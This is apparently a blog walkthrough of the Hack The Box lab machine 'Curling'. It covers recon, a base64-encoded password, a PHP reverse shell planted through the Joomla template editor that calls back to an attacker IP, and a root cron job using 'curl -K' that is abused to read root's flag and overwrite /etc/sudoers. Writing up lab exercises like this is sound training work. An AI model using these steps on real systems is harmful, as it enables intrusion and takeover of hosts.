Pages

Search

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 15:24 CET
Stats: 0:04:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.55% done; ETC: 15:31 (0:01:58 remaining)
Stats: 0:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.37% done; ETC: 15:32 (0:01:18 remaining)
Stats: 0:08:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.73% done; ETC: 15:33 (0:00:17 remaining)
Warning: 10.10.10.150 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.150
Host is up (0.063s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
24259/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 551.88 seconds

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.150
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/11/20 15:37:47 Starting gobuster
===============================================================
http://10.10.10.150/images (Status: 301)
http://10.10.10.150/templates (Status: 301)
http://10.10.10.150/media (Status: 301)
http://10.10.10.150/modules (Status: 301)
http://10.10.10.150/bin (Status: 301)
http://10.10.10.150/plugins (Status: 301)
http://10.10.10.150/includes (Status: 301)
http://10.10.10.150/language (Status: 301)
http://10.10.10.150/components (Status: 301)
http://10.10.10.150/cache (Status: 301)
http://10.10.10.150/libraries (Status: 301)
http://10.10.10.150/tmp (Status: 301)
http://10.10.10.150/layouts (Status: 301)
http://10.10.10.150/administrator (Status: 301)
http://10.10.10.150/cli (Status: 301)
http://10.10.10.150/server-status (Status: 403)
[ERROR] 2020/11/20 16:01:39 [!] Get http://10.10.10.150/Mexico_City: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/11/20 16:05:40 Finished
===============================================================

If we access to http://10.10.10.150/administrator/, we’ll find a Joomla login form.

Accessing to http://10.10.10.150,

Based on the published post there are these users:

  • Super User
  • Floris

Watching on the source code, there is a suspicious secret.txt file somewhere.

</div>
	</footer>
</body>
      <!-- secret.txt -->
</html>

http://10.10.10.150/secret.txt

Q3VybGluZzIwMTgh

This string seems to be encoded.

Searching for: «linux decode string», Google give us the suggestion of base64. It worth to give it a fast try.

$ echo Q3VybGluZzIwMTgh | base64 --decode

Curling2018!

Now we have 2 possible user names and a password.
Let’s try to use them into the Joomla admin site:

From the Joomla template edit section can be added a php reverse shell directly:

Using the Pestmonkey php reverse shell (https://github.com/pentestmonkey/php-reverse-shell)

<?php
set_time_limit (0);
$VERSION = "1.0";

$ip = '10.10.14.14';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...

$ nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.150] 39474
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 10:29:30 up 17:01,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

$ cd /home/floris
$ ls -la

total 44
drwxr-xr-x 6 floris floris 4096 May 22  2018 .
drwxr-xr-x 3 root   root   4096 May 22  2018 ..
lrwxrwxrwx 1 root   root      9 May 22  2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr  4  2018 .bashrc
drwx------ 2 floris floris 4096 May 22  2018 .cache
drwx------ 3 floris floris 4096 May 22  2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22  2018 .local
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
drwxr-x--- 2 root   floris 4096 May 22  2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22  2018 password_backup
-rw-r----- 1 floris floris   33 May 22  2018 user.txt

We don’t have permission to read user.txt, but password_backup is readable for everyone.

$ cat password_backup

00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H
$

It is a binary file and according to the file signature, it is a Bzip2 file.

Using Cyberchef:

After several Decompress processes we obtain:

Password = 5d<wdCbdZu)|hChXll

Now let’s try to use the ssh open port:

user = `floris`
password = `5d<wdCbdZu)|hChXll`

$ ssh floris@10.10.10.150

floris@10.10.10.150's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 23 11:09:11 UTC 2020

  System load:  0.01              Processes:            174
  Usage of /:   46.4% of 9.78GB   Users logged in:      0
  Memory usage: 24%               IP address for ens33: 10.10.10.150
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$

floris@curling:~$ ls

admin-area  password_backup  user.txt

floris@curling:~$ cat user.txt

65ddXXXXXXXXXXXXXXXXXXXXXXXXXXXX

To get our root’s flag we start using Pspy.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

Our architecture’s box is x64, so we need to download pspy64.
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

floris@curling:~$ wget http://10.10.14.14:8000/pspy64

--2020-11-30 09:34:47--  http://10.10.14.14:8000/pspy64
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                      100%[===========================================>]   2.94M  1.44MB/s    in 2.0s    

2020-11-30 09:34:49 (1.44 MB/s) - ‘pspy64’ saved [3078592/3078592]

floris@curling:~$ ls -la

total 3052
drwxr-xr-x 6 floris floris    4096 Nov 30 09:34 .
drwxr-xr-x 3 root   root      4096 May 22  2018 ..
drwxr-x--- 2 root   floris    4096 May 22  2018 admin-area
lrwxrwxrwx 1 root   root         9 May 22  2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris    3771 Apr  4  2018 .bashrc
drwx------ 2 floris floris    4096 May 22  2018 .cache
drwx------ 3 floris floris    4096 May 22  2018 .gnupg
drwxrwxr-x 3 floris floris    4096 May 22  2018 .local
-rw-r--r-- 1 floris floris    1076 May 22  2018 password_backup
-rw-r--r-- 1 floris floris     807 Apr  4  2018 .profile
-rw-rw-r-- 1 floris floris 3078592 Nov 30 09:24 pspy64
-rw-r----- 1 floris floris      33 May 22  2018 user.txt

floris@curling:~$ chmod +x pspy64
floris@curling:~$ ./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855          

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)                                                                                                     
Draining file system events due to startup...                                                                   
done                                                                                                            
                                                       
2020/11/30 09:38:35 CMD: UID=0    PID=84     |                                                                  
2020/11/30 09:38:35 CMD: UID=101  PID=835    | /lib/systemd/systemd-resolved                                    
2020/11/30 09:38:35 CMD: UID=100  PID=818    | /lib/systemd/systemd-networkd                                    
2020/11/30 09:38:35 CMD: UID=0    PID=8      | 
2020/11/30 09:38:35 CMD: UID=0    PID=7      | 
2020/11/30 09:38:35 CMD: UID=62583 PID=615    | /lib/systemd/systemd-timesyncd 
2020/11/30 09:38:35 CMD: UID=0    PID=6      | 
2020/11/30 09:38:35 CMD: UID=0    PID=550    | 
2020/11/30 09:38:35 CMD: UID=0    PID=509    | /lib/systemd/systemd-udevd 
2020/11/30 09:38:35 CMD: UID=0    PID=504    | /sbin/lvmetad -f 
2020/11/30 09:38:35 CMD: UID=0    PID=493    | 
2020/11/30 09:38:35 CMD: UID=0    PID=487    | 
2020/11/30 09:38:35 CMD: UID=0    PID=486    | 
2020/11/30 09:38:35 CMD: UID=0    PID=484    | /lib/systemd/systemd-journald 
2020/11/30 09:38:35 CMD: UID=0    PID=476    | /usr/bin/vmtoolsd 
2020/11/30 09:38:35 CMD: UID=0    PID=42     | 
2020/11/30 09:38:35 CMD: UID=0    PID=242    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2414   | ./pspy64 
2020/11/30 09:38:35 CMD: UID=0    PID=241    | 
2020/11/30 09:38:35 CMD: UID=0    PID=237    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2363   | -bash 
2020/11/30 09:38:35 CMD: UID=1000 PID=2362   | sshd: floris@pts/0   
2020/11/30 09:38:35 CMD: UID=0    PID=236    | 
2020/11/30 09:38:35 CMD: UID=0    PID=230    | 
2020/11/30 09:38:35 CMD: UID=0    PID=229    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2287   | (sd-pam) 
2020/11/30 09:38:35 CMD: UID=1000 PID=2286   | /lib/systemd/systemd --user 
2020/11/30 09:38:35 CMD: UID=0    PID=228    | 
2020/11/30 09:38:35 CMD: UID=0    PID=2277   | sshd: floris [priv]  
2020/11/30 09:38:35 CMD: UID=0    PID=2276   | 
2020/11/30 09:38:35 CMD: UID=0    PID=18     | 
2020/11/30 09:38:35 CMD: UID=33   PID=1776   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1774   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1772   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1771   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1770   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1769   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1768   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1767   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=176    | 
2020/11/30 09:38:35 CMD: UID=0    PID=173    | 
2020/11/30 09:38:35 CMD: UID=0    PID=16     | 
2020/11/30 09:38:35 CMD: UID=0    PID=15     | 
2020/11/30 09:38:35 CMD: UID=0    PID=14     | 
2020/11/30 09:38:35 CMD: UID=33   PID=1365   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1360   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=1340   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=13     | 
2020/11/30 09:38:35 CMD: UID=111  PID=1272   | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid 
2020/11/30 09:38:35 CMD: UID=0    PID=1230   | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/11/30 09:38:35 CMD: UID=0    PID=121    | 
2020/11/30 09:38:35 CMD: UID=0    PID=12     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1176   | /usr/lib/policykit-1/polkitd --no-debug 
2020/11/30 09:38:35 CMD: UID=0    PID=1162   | /usr/sbin/sshd -D 
2020/11/30 09:38:35 CMD: UID=0    PID=1142   | /sbin/iscsid 
2020/11/30 09:38:35 CMD: UID=0    PID=1138   | /sbin/iscsid 
2020/11/30 09:38:35 CMD: UID=0    PID=1100   | /usr/lib/snapd/snapd 
2020/11/30 09:38:35 CMD: UID=0    PID=11     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1091   | /usr/sbin/irqbalance --foreground 
2020/11/30 09:38:35 CMD: UID=0    PID=1089   | /usr/sbin/cron -f 
2020/11/30 09:38:35 CMD: UID=103  PID=1057   | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                        
2020/11/30 09:38:35 CMD: UID=0    PID=1056   | /lib/systemd/systemd-logind 
2020/11/30 09:38:35 CMD: UID=0    PID=1055   | /usr/bin/python3 /usr/bin/networkd-dispatcher 
2020/11/30 09:38:35 CMD: UID=0    PID=104    | 
2020/11/30 09:38:35 CMD: UID=0    PID=1036   | /usr/sbin/atd -f 
2020/11/30 09:38:35 CMD: UID=102  PID=1028   | /usr/sbin/rsyslogd -n 
2020/11/30 09:38:35 CMD: UID=0    PID=1023   | /usr/bin/lxcfs /var/lib/lxcfs/ 
2020/11/30 09:38:35 CMD: UID=0    PID=1018   | /usr/bin/VGAuthService 
2020/11/30 09:38:35 CMD: UID=0    PID=1014   | /usr/lib/accountsservice/accounts-daemon 
2020/11/30 09:38:35 CMD: UID=0    PID=10     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2020/11/30 09:39:01 CMD: UID=0    PID=2441   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:39:01 CMD: UID=0    PID=2440   | sleep 1 
2020/11/30 09:39:01 CMD: UID=0    PID=2439   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:39:01 CMD: UID=0    PID=2438   | 
2020/11/30 09:39:01 CMD: UID=0    PID=2437   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:39:01 CMD: UID=0    PID=2436   | /usr/sbin/CRON -f 
2020/11/30 09:39:01 CMD: UID=0    PID=2435   | /usr/sbin/CRON -f 
2020/11/30 09:39:01 CMD: UID=0    PID=2434   | /usr/sbin/CRON -f
2020/11/30 09:39:09 CMD: UID=0    PID=2443   | (ionclean) 
2020/11/30 09:39:09 CMD: UID=0    PID=2453   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2452   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2451   | /bin/sh /usr/sbin/phpquery -V 
2020/11/30 09:39:09 CMD: UID=0    PID=2450   | sort -rn -t: -k2,2 
2020/11/30 09:39:09 CMD: UID=0    PID=2449   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2468   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2467   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2466   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2465   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2464   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2463   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2462   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2461   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2460   | php7.2 -c /etc/php/7.2/apache2/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";                             
2020/11/30 09:39:09 CMD: UID=0    PID=2469   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2472   | sed -ne s/^session\.save_handler=\(.*\)$/\1/p 
2020/11/30 09:39:09 CMD: UID=0    PID=2470   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2481   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2479   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2482   | php7.2 -c /etc/php/7.2/cli/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";                                 
2020/11/30 09:39:09 CMD: UID=0    PID=2485   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2483   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=???  PID=2486   | ???
2020/11/30 09:39:09 CMD: UID=0    PID=2491   | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p 
2020/11/30 09:39:09 CMD: UID=0    PID=2490   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2489   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2493   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2492   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2495   | pidof apache2 php7.2 
2020/11/30 09:39:09 CMD: UID=0    PID=2497   | find /proc/1774/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2498   | find /proc/1772/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2499   | find /proc/1771/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=???  PID=2500   | ???
2020/11/30 09:39:09 CMD: UID=0    PID=2501   | find /proc/1769/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2502   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2503   | find /proc/1767/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2504   | find /proc/1365/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2507   | find -O3 /var/lib/php/sessions/ -ignore_readdir_race -depth -mindepth 1 -name sess_* -type f -cmin +24 -delete                                                                   
2020/11/30 09:39:09 CMD: UID=0    PID=2513   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2510   | 
2020/11/30 09:40:01 CMD: UID=0    PID=2527   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:40:01 CMD: UID=0    PID=2526   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:40:01 CMD: UID=0    PID=2525   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:40:01 CMD: UID=0    PID=2523   | /usr/sbin/CRON -f 
2020/11/30 09:40:01 CMD: UID=0    PID=2522   | /usr/sbin/CRON -f 
2020/11/30 09:40:01 CMD: UID=0    PID=2528   | sleep 1 
2020/11/30 09:41:01 CMD: UID=0    PID=2533   | sleep 1 
2020/11/30 09:41:01 CMD: UID=0    PID=2532   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:41:01 CMD: UID=0    PID=2531   | /usr/sbin/CRON -f 
2020/11/30 09:41:01 CMD: UID=0    PID=2530   | /usr/sbin/CRON -f 
2020/11/30 09:41:01 CMD: UID=0    PID=2535   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:41:01 CMD: UID=0    PID=2534   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:42:01 CMD: UID=0    PID=2541   | sleep 1 
2020/11/30 09:42:01 CMD: UID=0    PID=2540   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:42:01 CMD: UID=0    PID=2539   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:42:01 CMD: UID=0    PID=2538   | /usr/sbin/CRON -f 
2020/11/30 09:42:01 CMD: UID=0    PID=2537   | /usr/sbin/CRON -f 
2020/11/30 09:42:01 CMD: UID=0    PID=2542   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:42:02 CMD: UID=0    PID=2543   | cat /root/default.txt 

We have some suspicious entries here:

...
2020/11/30 09:39:01 CMD: UID=0    PID=2441   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0    PID=2439   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                               
2020/11/30 09:39:01 CMD: UID=0    PID=2437   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                        
2020/11/30 09:40:01 CMD: UID=0    PID=2527   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                       
2020/11/30 09:40:01 CMD: UID=0    PID=2526   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                        
2020/11/30 09:40:01 CMD: UID=0    PID=2525   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                
2020/11/30 09:41:01 CMD: UID=0    PID=2532   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                        
2020/11/30 09:41:01 CMD: UID=0    PID=2535   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                               
2020/11/30 09:41:01 CMD: UID=0    PID=2534   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                               
2020/11/30 09:42:01 CMD: UID=0    PID=2540   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                
2020/11/30 09:42:01 CMD: UID=0    PID=2539   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                          2020/11/30 09:42:01 CMD: UID=0    PID=2542   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                            
...                                                

This entry is being repeatedly executed by root.

/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

It seems to be under a cron job.

This entry runs curl command with option -K and -o.

-K, --config <file>: Specify  a  text file to read curl arguments from. 
-o, --output <file>: Write  output  to  <file> instead of stdout. 

Then it runs curl using the input file and outputs the command results into the report file.

floris@curling:~/admin-area$ echo "url = \"file:///root/root.txt\"" > input
floris@curling:~/admin-area$ cat input

url = "file:///root/root.txt"

floris@curling:~/admin-area$ ls -la

total 28
drwxr-x--- 2 root   floris  4096 May 22  2018 .
drwxr-xr-x 6 floris floris  4096 Nov 30 09:34 ..
-rw-rw---- 1 root   floris    30 Nov 30 10:25 input
-rw-rw---- 1 root   floris 14236 Nov 30 10:25 report

floris@curling:~/admin-area$ ls -la

total 16
drwxr-x--- 2 root   floris 4096 May 22  2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root   floris   30 Nov 30 10:25 input
-rw-rw---- 1 root   floris   33 Nov 30 10:26 report

floris@curling:~/admin-area$ cat report

82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

What if we want a shell?

$ cat sudoers.txt

root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

$ python3 -m http.server 8080

Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.150 - - [30/Nov/2020 11:58:01] "GET /sudoers.txt HTTP/1.1" 200 -

floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.14:8080/sudoers.txt"\noutput = "/etc/sudoers"' > input

echo -e option = enable interpretation of backslash escapes

floris@curling:~/admin-area$ cat input

url = "http://10.10.14.14:8080/sudoers.txt"
output = "/etc/sudoers"

floris@curling:~/admin-area$ sudo su root

[sudo] password for floris: 
root@curling:/home/floris/admin-area#

root@curling:/home/floris/admin-area# whoami

root

root@curling:/home/floris/admin-area# cat /root/root.txt

82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *